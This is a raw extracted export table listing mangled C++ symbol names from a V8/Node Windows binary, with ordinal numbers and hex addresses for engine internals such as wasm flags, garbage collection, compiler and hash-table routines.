                                                                                                                                                                                                        ?FLAG_wasm_generic_wrapper@internal@v8@@3_NA61610x141ffbf81
                                                                                                                                                                                                        ?FLAG_wasm_lazy_compilation@internal@v8@@3_NA61620x1422b39df
                                                                                                                                                                                                        ?FLAG_wasm_lazy_validation@internal@v8@@3_NA61630x1422b39e0
                                                                                                                                                                                                        ?FLAG_wasm_loop_unrolling@internal@v8@@3_NA61640x141ffbf9d
                                                                                                                                                                                                        ?FLAG_wasm_math_intrinsics@internal@v8@@3_NA61650x141ffbf9c
                                                                                                                                                                                                        ?FLAG_wasm_max_code_space@internal@v8@@3IA61660x141ffbf90
                                                                                                                                                                                                        ?FLAG_wasm_max_initial_code_space_reservation@internal@v8@@3HA61670x1422b39e4
                                                                                                                                                                                                        ?FLAG_wasm_max_mem_pages@internal@v8@@3IA61680x141ffbf88
                                                                                                                                                                                                        ?FLAG_wasm_max_table_size@internal@v8@@3IA61690x141ffbf8c
                                                                                                                                                                                                        ?FLAG_wasm_memory_protection_keys@internal@v8@@3_NA61700x1422b39b2
                                                                                                                                                                                                        ?FLAG_wasm_num_compilation_tasks@internal@v8@@3HA61710x141ffbf84
                                                                                                                                                                                                        ?FLAG_wasm_opt@internal@v8@@3_NA61720x141ffbf99
                                                                                                                                                                                                        ?FLAG_wasm_simd_ssse3_codegen@internal@v8@@3_NA61730x1422b39e1
                                                                                                                                                                                                        ?FLAG_wasm_stack_checks@internal@v8@@3_NA61740x141ffbf9b
                                                                                                                                                                                                        ?FLAG_wasm_staging@internal@v8@@3_NA61750x1422b39d9
                                                                                                                                                                                                        ?FLAG_wasm_test_streaming@internal@v8@@3_NA61760x1422b39b3
                                                                                                                                                                                                        ?FLAG_wasm_tier_mask_for_testing@internal@v8@@3HA61770x1422b39b8
                                                                                                                                                                                                        ?FLAG_wasm_tier_up@internal@v8@@3_NA61780x141ffbf94
                                                                                                                                                                                                        ?FLAG_wasm_write_protect_code_memory@internal@v8@@3_NA61790x1422b39b1
                                                                                                                                                                                                        ?FLAG_win64_unwinding_info@internal@v8@@3_NA61800x141ffbecd
                                                                                                                                                                                                        ?FLAG_write_code_using_rwx@internal@v8@@3_NA61810x141ffbf21
                                                                                                                                                                                                        ?FLAG_write_protect_code_memory@internal@v8@@3_NA61820x141ffbfba
                                                                                                                                                                                                        ?FLAG_zone_stats_tolerance@internal@v8@@3_KA61830x141ffbfd0
                                                                                                                                                                                                        ?FOpen@OS@base@v8@@SAPEAU_iobuf@@PEBD0@Z61840x140e5ff40
                                                                                                                                                                                                        ?FPrint@OS@base@v8@@SAXPEAU_iobuf@@PEBDZZ61850x140e5ff70
                                                                                                                                                                                                        ?Fail@AsyncStreamingDecoder@wasm@internal@v8@@AEAAXXZ61860x140571aa0
                                                                                                                                                                                                        ?Fail@RegExpBytecodeGenerator@internal@v8@@UEAAXXZ61870x14073d5c0
                                                                                                                                                                                                        ?Fail@RegExpMacroAssemblerX64@internal@v8@@UEAAXXZ61880x1404acba0
                                                                                                                                                                                                        ?FailureExpression@Parser@internal@v8@@AEAAPEAVExpression@23@XZ61890x1402c3720
                                                                                                                                                                                                        ?FalseConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@XZ61900x140f55de0
                                                                                                                                                                                                        ?FalseConstant@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VOddball@internal@v8@@@34@XZ61910x140f5a0f0
                                                                                                                                                                                                        ?FalseInputOf@DiamondMatcher@compiler@internal@v8@@QEBAPEAVNode@234@PEAV5234@@Z61920x1404c2580
                                                                                                                                                                                                        ?FalsifyUndefined@OperationTyper@compiler@internal@v8@@AEAA?AVType@234@V?$Flags@W4ComparisonOutcomeFlags@OperationTyper@compiler@internal@v8@@H@base@4@@Z61930x1410a0e00
                                                                                                                                                                                                        ?FarJumpSlotIndexToOffset@JumpTableAssembler@wasm@internal@v8@@SAII@Z61940x1404762b0
                                                                                                                                                                                                        ?FarJumpSlotOffsetToIndex@JumpTableAssembler@wasm@internal@v8@@SAII@Z61950x14052f840
                                                                                                                                                                                                        ?FastApiCall@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBV?$ZoneVector@UFastApiCallFunction@compiler@internal@v8@@@34@AEBUFeedbackSource@234@PEAVCallDescriptor@234@@Z61960x140f4e1b0
                                                                                                                                                                                                        ?FastDtoa@base@v8@@YA_NNW4FastDtoaMode@12@HV?$Vector@D@12@PEAH2@Z61970x140e6e320
                                                                                                                                                                                                        ?FastFixedDtoa@base@v8@@YA_NNHV?$Vector@D@12@PEAH1@Z61980x140e6e840
                                                                                                                                                                                                        ?FastForwardSchedule@IncrementalMarking@internal@v8@@AEAAXXZ61990x1409a75d0
                                                                                                                                                                                                        ?FastForwardScheduleIfCloseToFinalization@IncrementalMarking@internal@v8@@AEAAXXZ62000x1409a7600
                                                                                                                                                                                                        ?FastNewFunctionContext@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@W4ScopeType@23@@Z62010x140ab26b0
                                                                                                                                                                                                        ?FatalException@node@@YAXPEAVIsolate@v8@@AEBVTryCatch@3@@Z62020x14028aa90
                                                                                                                                                                                                        ?FatalImpl@internal@cppgc@@YAXPEBDAEBVSourceLocation@2@@Z62030x1404619e0
                                                                                                                                                                                                        ?FatalProcessOutOfHeapMemory@Isolate@internal@v8@@QEAAXPEBD@Z62040x140483a40
                                                                                                                                                                                                        ?FatalProcessOutOfHeapMemory@LocalIsolate@internal@v8@@QEAAXPEBD@Z62050x140450810
                                                                                                                                                                                                        ?FatalProcessOutOfMemory@internal@v8@@YAXPEAVIsolate@12@PEBD@Z62060x140b12120
                                                                                                                                                                                                        ?FeedbackIsInsufficient@JSHeapBroker@compiler@internal@v8@@QEBA_NAEBUFeedbackSource@234@@Z62070x140f2e870
                                                                                                                                                                                                        ?FeedbackVectorSpecPrint@FeedbackVectorSpec@internal@v8@@QEAAXAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@@Z62080x140a318b0
                                                                                                                                                                                                        ?FetchAndClearInterrupts@StackGuard@internal@v8@@AEAAHXZ62090x140a00940
                                                                                                                                                                                                        ?FetchBackgroundCounters@GCTracer@internal@v8@@AEAAXHH@Z62100x1409c8990
                                                                                                                                                                                                        ?FetchBackgroundGeneralCounters@GCTracer@internal@v8@@AEAAXXZ62110x1409c8a30
                                                                                                                                                                                                        ?FetchBackgroundMarkCompactCounters@GCTracer@internal@v8@@AEAAXXZ62120x1409c8a40
                                                                                                                                                                                                        ?FetchBackgroundMinorGCCounters@GCTracer@internal@v8@@AEAAXXZ62130x1409c8aa0
                                                                                                                                                                                                        ?FetchBytesMarkedConcurrently@IncrementalMarking@internal@v8@@AEAAXXZ62140x1409a7640
                                                                                                                                                                                                        ?FetchValue@LookupIterator@internal@v8@@AEBA?AV?$Handle@VObject@internal@v8@@@23@W4AllocationPolicy@23@@Z62150x14081c140
                                                                                                                                                                                                        ?FieldAccessOf@compiler@internal@v8@@YAAEBUFieldAccess@123@PEBVOperator@123@@Z62160x14032ab80
                                                                                                                                                                                                        ?FieldIndexOf@LoadElimination@compiler@internal@v8@@CA?AVIndexRange@1234@AEBUFieldAccess@234@@Z62170x1410336d0
                                                                                                                                                                                                        ?FieldIndexOf@LoadElimination@compiler@internal@v8@@CA?AVIndexRange@1234@HH@Z62180x141033790
                                                                                                                                                                                                        ?FieldRepresentationDependencyOffTheRecord@CompilationDependencies@compiler@internal@v8@@QEBAPEBVCompilationDependency@234@AEBVMapRef@234@VInternalIndex@34@VRepresentation@34@@Z62190x140f349c0
                                                                                                                                                                                                        ?FieldTypeDependencyOffTheRecord@CompilationDependencies@compiler@internal@v8@@QEBAPEBVCompilationDependency@234@AEBVMapRef@234@VInternalIndex@34@AEBVObjectRef@234@@Z62200x140f34a50
                                                                                                                                                                                                        ?FileName@SourceLocation@cppgc@@QEBAPEBDXZ62210x140078d50
                                                                                                                                                                                                        ?Fill@WasmTableObject@internal@v8@@SAXPEAVIsolate@23@V?$Handle@VWasmTableObject@internal@v8@@@23@IV?$Handle@VObject@internal@v8@@@23@I@Z62220x14052f850
                                                                                                                                                                                                        ?FillBufferWithValues@StateValuesCache@compiler@internal@v8@@AEAAIPEAV?$array@PEAVNode@compiler@internal@v8@@$07@std@@PEA_K1PEAPEAVNode@234@_KPEBVBitVector@34@H@Z62230x140f57390
                                                                                                                                                                                                        ?FillEntriesWithHoles@?$ObjectHashTableBase@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SAXV?$Handle@VEphemeronHashTable@internal@v8@@@23@@Z62240x1407f73a0
                                                                                                                                                                                                        ?FillEntriesWithHoles@?$ObjectHashTableBase@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SAXV?$Handle@VObjectHashTable@internal@v8@@@23@@Z62250x1407f73a0
                                                                                                                                                                                                        ?FilterSpillMoves@TopLevelLiveRange@compiler@internal@v8@@QEAAXPEAVTopTierRegisterAllocationData@234@AEBVInstructionOperand@234@@Z62260x140f857e0
                                                                                                                                                                                                        ?FinalIncrementalMarkCompactSpeedInBytesPerMillisecond@GCTracer@internal@v8@@QEBANXZ62270x1409c8ae0
                                                                                                                                                                                                        ?FinalizationRegistry_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ62280x140483a60
                                                                                                                                                                                                        ?FinalizationRegistry_string@LocalFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ62290x1406cdc10
                                                                                                                                                                                                        ?Finalize@ByteData@PreparseDataBuilder@internal@v8@@QEAAXPEAVZone@34@@Z62300x1407a00f0
                                                                                                                                                                                                        ?Finalize@CodeObjectRegistry@internal@v8@@QEAAXXZ62310x1409f20d0
                                                                                                                                                                                                        ?Finalize@EscapeAnalysisReducer@compiler@internal@v8@@UEAAXXZ62320x140fd4140
                                                                                                                                                                                                        ?Finalize@IncrementalMarking@internal@v8@@QEAAXXZ62330x1409a76c0
                                                                                                                                                                                                        ?Finalize@JSCallReducer@compiler@internal@v8@@UEAAXXZ62340x140fdc1c0
                                                                                                                                                                                                        ?Finalize@JSToWasmWrapperCompilationUnit@wasm@internal@v8@@QEAA?AV?$Handle@VCode@internal@v8@@@34@XZ62350x1405c0680
                                                                                                                                                                                                        ?Finalize@Reducer@compiler@internal@v8@@UEAAXXZ62360x140078990
                                                                                                                                                                                                        ?FinalizeBackgroundCompileTask@Compiler@internal@v8@@SA_NPEAVBackgroundCompileTask@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@PEAVIsolate@23@W4ClearExceptionFlag@123@@Z62370x140aa9c50
                                                                                                                                                                                                        ?FinalizeBlockScope@Scope@internal@v8@@QEAAPEAV123@XZ62380x140af53b0
                                                                                                                                                                                                        ?FinalizeChildren@PreparseDataBuilder@internal@v8@@AEAAXPEAVZone@23@@Z62390x1407a0180
                                                                                                                                                                                                        ?FinalizeCode@CodeGenerator@compiler@internal@v8@@QEAA?AV?$MaybeHandle@VCode@internal@v8@@@34@XZ62400x140ee7700
                                                                                                                                                                                                        ?FinalizeCurrentBlock@GraphAssembler@compiler@internal@v8@@QEAAPEAVBasicBlock@234@PEAV5234@@Z62410x140f5a150
                                                                                                                                                                                                        ?FinalizeGarbageCollection@Heap@internal@cppgc@@AEAAXW4EmbedderStackState@3@@Z62420x140462320
                                                                                                                                                                                                        ?FinalizeGarbageCollection@StandaloneTestingHeap@testing@cppgc@@QEAAXW4EmbedderStackState@3@@Z62430x140451780
                                                                                                                                                                                                        ?FinalizeIncrementalGarbageCollectionForTesting@CppHeap@internal@v8@@EEAAXW4EmbedderStackState@cppgc@@@Z62440x1409e9eb0
                                                                                                                                                                                                        ?FinalizeIncrementalGarbageCollectionForTesting@Heap@internal@cppgc@@EEAAXW4EmbedderStackState@3@@Z62450x140462440
                                                                                                                                                                                                        ?FinalizeIncrementalGarbageCollectionIfNeeded@CppHeap@internal@v8@@EEAAXW4EmbedderStackState@cppgc@@@Z62460x140078990
                                                                                                                                                                                                        ?FinalizeIncrementalGarbageCollectionIfNeeded@Heap@internal@cppgc@@EEAAXW4EmbedderStackState@3@@Z62470x140462460
                                                                                                                                                                                                        ?FinalizeIncrementalGarbageCollectionIfRunning@Heap@internal@cppgc@@QEAAXUConfig@GarbageCollector@23@@Z62480x140462e00
                                                                                                                                                                                                        ?FinalizeIncrementalMarkingAtomically@Heap@internal@v8@@QEAAXW4GarbageCollectionReason@23@@Z62490x1409b5460
                                                                                                                                                                                                        ?FinalizeIncrementally@IncrementalMarking@internal@v8@@QEAAXXZ62500x1409a76e0
                                                                                                                                                                                                        ?FinalizeJob@OptimizedCompilationJob@internal@v8@@QEAA?AW4Status@CompilationJob@23@PEAVIsolate@23@@Z62510x140aa9f20
                                                                                                                                                                                                        ?FinalizeJumpOptimizationInfo@Assembler@internal@v8@@QEAAXXZ62520x14050c680
                                                                                                                                                                                                        ?FinalizeJumpOptimizationInfo@AssemblerBase@internal@v8@@QEAAXXZ62530x140078990
                                                                                                                                                                                                        ?FinalizeMarking@IncrementalMarking@internal@v8@@QEAAXW4CompletionAction@123@@Z62540x1409a7910
                                                                                                                                                                                                        ?FinalizeMoves@MoveOptimizer@compiler@internal@v8@@AEAAXPEAVInstruction@234@@Z62550x140f768f0
                                                                                                                                                                                                        ?FinalizeOnHeapCode@CodeBuilder@Factory@internal@v8@@AEAAXV?$Handle@VCode@internal@v8@@@34@VByteArray@34@@Z62560x1409d1370
                                                                                                                                                                                                        ?FinalizeOptimizedCompilationJob@Compiler@internal@v8@@SA_NPEAVOptimizedCompilationJob@23@PEAVIsolate@23@@Z62570x140aaa030
                                                                                                                                                                                                        ?FinalizeSerialization@ReadOnlySerializer@internal@v8@@QEAAXXZ62580x1406ccd90
                                                                                                                                                                                                        ?FinalizeTracing@EmbedderHeapTracer@v8@@QEAAXXZ62590x140b12130
                                                                                                                                                                                                        ?FinalizeTranslatedAsmJs@WasmEngine@wasm@internal@v8@@QEAA?AV?$Handle@VWasmModuleObject@internal@v8@@@34@PEAVIsolate@34@V?$Handle@VAsmWasmData@internal@v8@@@34@V?$Handle@VScript@internal@v8@@@34@@Z62600x140556710
                                                                                                                                                                                                        ?Find@SignatureMap@wasm@internal@v8@@QEBAHAEBV?$Signature@VValueType@wasm@internal@v8@@@34@@Z62610x140573ab0
                                                                                                                                                                                                        ?FindBreakablePosition@Debug@internal@v8@@AEAAHV?$Handle@VDebugInfo@internal@v8@@@23@H@Z62620x140a5eff0
                                                                                                                                                                                                        ?FindChild@ProfileNode@internal@v8@@QEAAPEAV123@PEAVCodeEntry@23@H@Z62630x14074df30
                                                                                                                                                                                                        ?FindClosestSharedFunctionInfoFromPosition@Debug@internal@v8@@QEAA?AV?$Handle@VSharedFunctionInfo@internal@v8@@@23@HV?$Handle@VScript@internal@v8@@@23@V423@@Z62640x140a5f400
                                                                                                                                                                                                        ?FindCodeObject@Isolate@internal@v8@@QEAA?AVCode@23@_K@Z62650x140a10d30
                                                                                                                                                                                                        ?FindDebugInfo@Debug@internal@v8@@AEAAXV?$Handle@VDebugInfo@internal@v8@@@23@PEAPEAVDebugInfoListNode@23@1@Z62660x140a5f6e0
                                                                                                                                                                                                        ?FindElementsKindTransitionedMap@Map@internal@v8@@QEAA?AV123@PEAVIsolate@23@AEBV?$vector@V?$Handle@VMap@internal@v8@@@internal@v8@@V?$allocator@V?$Handle@VMap@internal@v8@@@internal@v8@@@std@@@std@@W4ConcurrencyMode@23@@Z62670x1408115c0
                                                                                                                                                                                                        ?FindEntry@?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@QEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@PEAVHashTableKey@23@H@Z62680x1407f73f0
                                                                                                                                                                                                        ?FindEntry@?$HashTable@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@QEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@V?$Handle@VObject@internal@v8@@@23@H@Z62690x140483a70
                                                                                                                                                                                                        ?FindEntry@?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@V?$Handle@VName@internal@v8@@@23@H@Z62700x140483b20
                                                                                                                                                                                                        ?FindEntry@?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@V?$Handle@VName@internal@v8@@@23@H@Z62710x140483bd0
                                                                                                                                                                                                        ?FindEntry@?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@QEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@IH@Z62720x1407f74a0
                                                                                                                                                                                                        ?FindEntry@?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@QEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@V?$Handle@VObject@internal@v8@@@23@H@Z62730x140483c60
                                                                                                                                                                                                        ?FindEntry@?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@QEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@V?$Handle@VObject@internal@v8@@@23@H@Z62740x140483a70
                                                                                                                                                                                                        ?FindEntry@?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@QEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@IH@Z62750x1407f7560
                                                                                                                                                                                                        ?FindEntry@?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@QEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@VString@23@H@Z62760x1407f7620
                                                                                                                                                                                                        ?FindEntry@?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@QEAA?AVInternalIndex@23@PEAVIsolate@23@VObject@23@@Z62770x1407e4a80
                                                                                                                                                                                                        ?FindEntry@?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@QEAA?AVInternalIndex@23@PEAVIsolate@23@VObject@23@@Z62780x1407e4c90
                                                                                                                                                                                                        ?FindEntry@?$OrderedHashTable@VOrderedNameDictionary@internal@v8@@$02@internal@v8@@QEAA?AVInternalIndex@23@PEAVIsolate@23@VObject@23@@Z62790x1407e4ea0
                                                                                                                                                                                                        ?FindEntry@?$SmallOrderedHashTable@VSmallOrderedNameDictionary@internal@v8@@@internal@v8@@QEAA?AVInternalIndex@23@PEAVIsolate@23@VObject@23@@Z62800x1407e52c0
                                                                                                                                                                                                        ?FindEntry@CodeMap@internal@v8@@QEAAPEAVCodeEntry@23@_KPEA_K@Z62810x14074e030
                                                                                                                                                                                                        ?FindEntry@IdentityMapBase@internal@v8@@IEBAPEA_K_K@Z62820x1406b4650
                                                                                                                                                                                                        ?FindEntry@OSROptimizedCodeCache@internal@v8@@AEAAHV?$Handle@VSharedFunctionInfo@internal@v8@@@23@VBytecodeOffset@23@@Z62830x1407dfc70
                                                                                                                                                                                                        ?FindEntry@OrderedNameDictionaryHandler@internal@v8@@SA?AVInternalIndex@23@PEAVIsolate@23@VHeapObject@23@VName@23@@Z62840x1407e5330
                                                                                                                                                                                                        ?FindEntry@Symbolizer@internal@v8@@AEAAPEAVCodeEntry@23@_KPEA_K@Z62850x140745aa0
                                                                                                                                                                                                        ?FindFieldOwner@Map@internal@v8@@QEBA?AV123@PEAVIsolate@23@VInternalIndex@23@@Z62860x1408119d0
                                                                                                                                                                                                        ?FindFieldOwner@MapRef@compiler@internal@v8@@QEBA?AV1234@VInternalIndex@34@@Z62870x140e84c50
                                                                                                                                                                                                        ?FindFirstEmpty@SwissNameDictionary@internal@v8@@AEAAHI@Z62880x140483d10
                                                                                                                                                                                                        ?FindFrameStateBefore@NodeProperties@compiler@internal@v8@@SAPEAVNode@234@PEAV5234@0@Z62890x140eac920
                                                                                                                                                                                                        ?FindFunctionsToRecompile@NativeModule@wasm@internal@v8@@QEAA?AV?$vector@HV?$allocator@H@std@@@std@@W4TieringState@234@@Z62900x14056adf0
                                                                                                                                                                                                        ?FindHandlerForMap@FeedbackNexus@internal@v8@@QEBA?AVMaybeObjectHandle@23@V?$Handle@VMap@internal@v8@@@23@@Z62910x14087aec0
                                                                                                                                                                                                        ?FindInnermostContainingFunctionInfo@Debug@internal@v8@@QEAA?AV?$Handle@VObject@internal@v8@@@23@V?$Handle@VScript@internal@v8@@@23@H@Z62920x140a5f7a0
                                                                                                                                                                                                        ?FindInsertionEntry@?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@IEAA?AVInternalIndex@23@PEAVIsolate@23@I@Z62930x1407f7700
                                                                                                                                                                                                        ?FindInsertionEntry@?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@IEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@I@Z62940x1407f7760
                                                                                                                                                                                                        ?FindInsertionEntry@?$HashTable@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@IEAA?AVInternalIndex@23@PEAVIsolate@23@I@Z62950x1407f77c0
                                                                                                                                                                                                        ?FindInsertionEntry@?$HashTable@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@IEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@I@Z62960x1407f7830
                                                                                                                                                                                                        ?FindInsertionEntry@?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@IEAA?AVInternalIndex@23@PEAVIsolate@23@I@Z62970x1407f78a0
                                                                                                                                                                                                        ?FindInsertionEntry@?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@IEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@I@Z62980x1407f7900
                                                                                                                                                                                                        ?FindInsertionEntry@?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@IEAA?AVInternalIndex@23@PEAVIsolate@23@I@Z62990x1407f7960
                                                                                                                                                                                                        ?FindInsertionEntry@?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@IEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@I@Z63000x1407f79c0
                                                                                                                                                                                                        ?FindInsertionEntry@?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@IEAA?AVInternalIndex@23@PEAVIsolate@23@I@Z63010x1407f7a20
                                                                                                                                                                                                        ?FindInsertionEntry@?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@IEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@I@Z63020x1407f7aa0
                                                                                                                                                                                                        ?FindInsertionEntry@?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@IEAA?AVInternalIndex@23@PEAVIsolate@23@I@Z63030x1407f7b10
                                                                                                                                                                                                        ?FindInsertionEntry@?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@IEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@I@Z63040x1407f7b70
                                                                                                                                                                                                        ?FindInsertionEntry@?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@IEAA?AVInternalIndex@23@PEAVIsolate@23@I@Z63050x1407f77c0
                                                                                                                                                                                                        ?FindInsertionEntry@?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@IEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@I@Z63060x1407f7830
                                                                                                                                                                                                        ?FindInsertionEntry@?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@IEAA?AVInternalIndex@23@PEAVIsolate@23@I@Z63070x1407f77c0
                                                                                                                                                                                                        ?FindInsertionEntry@?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@IEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@I@Z63080x1407f7830
                                                                                                                                                                                                        ?FindInsertionEntry@?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@IEAA?AVInternalIndex@23@PEAVIsolate@23@I@Z63090x1407f7b10
                                                                                                                                                                                                        ?FindInsertionEntry@?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@IEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@I@Z63100x1407f7b70
                                                                                                                                                                                                        ?FindInstanceInPrototypeChain@Object@v8@@QEAA?AV?$Local@VObject@v8@@@2@V?$Local@VFunctionTemplate@v8@@@2@@Z63110x140b12160
                                                                                                                                                                                                        ?FindJumpTablesForRegionLocked@NativeModule@wasm@internal@v8@@QEBA?AUJumpTablesRef@1234@VAddressRegion@base@4@@Z63120x14056b1a0
                                                                                                                                                                                                        ?FindLocationInStatsTable@StatsCounterBase@internal@v8@@IEBAPEAHXZ63130x1408dcb50
                                                                                                                                                                                                        ?FindObjectById@HeapProfiler@v8@@QEAA?AV?$Local@VValue@v8@@@2@I@Z63140x140b122e0
                                                                                                                                                                                                        ?FindOrAddChild@ProfileNode@internal@v8@@QEAAPEAV123@PEAVCodeEntry@23@H@Z63150x14074e0f0
                                                                                                                                                                                                        ?FindOrAllocatePerThreadDataForThisThread@Isolate@internal@v8@@QEAAPEAVPerIsolateThreadData@123@XZ63160x140a10d50
                                                                                                                                                                                                        ?FindOrInsert@SignatureMap@wasm@internal@v8@@QEAAIAEBV?$Signature@VValueType@wasm@internal@v8@@@34@@Z63170x140573b10
                                                                                                                                                                                                        ?FindOrInsertEntry@IdentityMapBase@internal@v8@@IEAA?AU?$IdentityMapFindResult@_K@23@_K@Z63180x1406b46a0
                                                                                                                                                                                                        ?FindOrderedHashMapEntry@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ63190x140f4e490
                                                                                                                                                                                                        ?FindOrderedHashMapEntryForInt32Key@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ63200x140f4e4a0
                                                                                                                                                                                                        ?FindPerThreadDataForThisThread@Isolate@internal@v8@@QEAAPEAVPerIsolateThreadData@123@XZ63210x140a10e40
                                                                                                                                                                                                        ?FindPerThreadDataForThread@Isolate@internal@v8@@QEAAPEAVPerIsolateThreadData@123@VThreadId@23@@Z63220x140a10ea0
                                                                                                                                                                                                        ?FindProjection@NodeProperties@compiler@internal@v8@@SAPEAVNode@234@PEAV5234@_K@Z63230x140eacac0
                                                                                                                                                                                                        ?FindRegion@RegionAllocator@base@v8@@AEAA?AV?$_Tree_const_iterator@V?$_Tree_val@U?$_Tree_simple_types@PEAVRegion@RegionAllocator@base@v8@@@std@@@std@@@std@@_K@Z63240x140e6cba0
                                                                                                                                                                                                        ?FindRootMap@Map@internal@v8@@QEBA?AV123@PEAVIsolate@23@@Z63250x140811a50
                                                                                                                                                                                                        ?FindRootMap@MapRef@compiler@internal@v8@@QEBA?AV?$Optional@VMapRef@compiler@internal@v8@@@base@4@XZ63260x140e84d50
                                                                                                                                                                                                        ?FindRootMap@MapUpdater@internal@v8@@AEAA?AW4State@123@XZ63270x140817510
                                                                                                                                                                                                        ?FindSharedFunctionInfosIntersectingRange@Debug@internal@v8@@QEAA_NV?$Handle@VScript@internal@v8@@@23@HHPEAV?$vector@V?$Handle@VSharedFunctionInfo@internal@v8@@@internal@v8@@V?$allocator@V?$Handle@VSharedFunctionInfo@internal@v8@@@internal@v8@@@std@@@std@@@Z63280x140a5fbb0
                                                                                                                                                                                                        ?FindSmallUnnestedLoopFromHeader@LoopFinder@compiler@internal@v8@@SAPEAV?$ZoneUnorderedSet@PEAVNode@compiler@internal@v8@@U?$hash@PEAVNode@compiler@internal@v8@@@base@4@U?$equal_to@PEAVNode@compiler@internal@v8@@@std@@@34@PEAVNode@234@PEAVZone@34@_K@Z63290x141039820
                                                                                                                                                                                                        ?FindSplitMap@MapUpdater@internal@v8@@AEAA?AV?$Handle@VMap@internal@v8@@@23@V?$Handle@VDescriptorArray@internal@v8@@@23@@Z63300x140817840
                                                                                                                                                                                                        ?FindSuccessfulControlProjection@NodeProperties@compiler@internal@v8@@SAPEAVNode@234@PEAV5234@@Z63310x140eacb40
                                                                                                                                                                                                        ?FindTargetMap@MapUpdater@internal@v8@@AEAA?AW4State@123@XZ63320x140817a70
                                                                                                                                                                                                        ?FindTransitionToDataProperty@TransitionsAccessor@internal@v8@@QEAA?AV?$MaybeHandle@VMap@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@W4RequestedLocation@123@@Z63330x1407bc4b0
                                                                                                                                                                                                        ?FindTransitionToField@TransitionsAccessor@internal@v8@@QEAA?AV?$MaybeHandle@VMap@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@@Z63340x140483df0
                                                                                                                                                                                                        ?FindVariableDeclaredIn@Scope@internal@v8@@QEAAPEBVAstRawString@23@PEAV123@W4VariableMode@23@@Z63350x140af54b0
                                                                                                                                                                                                        ?Finish@AsyncStreamingDecoder@wasm@internal@v8@@UEAAXXZ63360x140571ac0
                                                                                                                                                                                                        ?Finish@EhFrameWriter@internal@v8@@QEAAXH@Z63370x140a41380
